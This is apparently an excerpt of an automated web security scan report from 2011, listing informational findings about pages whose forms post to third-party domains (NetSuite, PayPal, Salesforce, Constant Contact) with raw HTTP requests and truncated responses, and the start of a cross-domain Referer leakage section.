Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="background-color: none;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<input type="text" name="ea" size="20" value="" style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif; font-size:11px; color: #dfdfdf; border: 1px solid #dfdfdf; background-color:
...[SNIP]...
22.9. http://www.customermagnetism.com/seo-faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /seo-faq/

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET /seo-faq/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.1.10.1303747424; __support_check=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="background-color: none;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<input type="text" name="ea" size="20" value="" style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif; font-size:11px; color: #dfdfdf; border: 1px solid #dfdfdf; background-color:
...[SNIP]...
22.10. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="buy_box_ess">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<div class="windows_box">
...[SNIP]...
22.11. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
</div>
<form id="ns_form_6" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...
22.12. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...
22.13. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_3" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...
22.14. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_2" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...
22.15. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_4" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...
22.16. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div>
<form id="ns_form_5" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...
22.17. http://www.integritydefender.com/buyerDetails.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /buyerDetails.php?buyerId=68 HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/buyerDetails.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</tr>
<form name="frmPaypal" id="frmPaypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <input type="hidden" name="cmd"                    value="_xclick" />
...[SNIP]...
22.18. http://www.removeyourname.com/company/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.removeyourname.com
Path:   /company/contact.html

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /company/contact.html HTTP/1.1
Host: www.removeyourname.com
Proxy-Connection: keep-alive
Referer: http://www.removeyourname.com/rip_off_report.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=136832947.1303747413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=136832947.1526791206.1303747413.1303747413.1303747413.1; __utmc=136832947; __utmb=136832947.6.10.1303747413

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:26:55 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 01:01:49 GMT
ETag: "a4314-38bd-49e8f16ed3940"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 14525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST" id="myform" name="myform">
    <input type=hidden name="oid" value="00D80000000dSyn" />
...[SNIP]...
22.19. http://www.reputationchanger.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationchanger.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.reputationchanger.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:55 GMT
Server: Apache
Last-Modified: Tue, 12 Apr 2011 15:44:10 GMT
ETag: "7e5261-4ccb-4a0ba902be680"
Accept-Ranges: bytes
Content-Length: 19659
Connection: close
Content-Type: text/html

<html>
<head>
<title>Online Reputation Management Remove name from Internet Remove name from Google - Reputation Changer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<table width="100%" border="0" cellspacing="0" cellpadding="3">
<form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST" onSubmit="return CustomVal(this)" language="JavaScript">
<input type=hidden name="oid" value="00DC0000000Piy3">
...[SNIP]...
23. Cross-domain Referer leakage  previous  next
There are 97 instances of this issue:

23.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
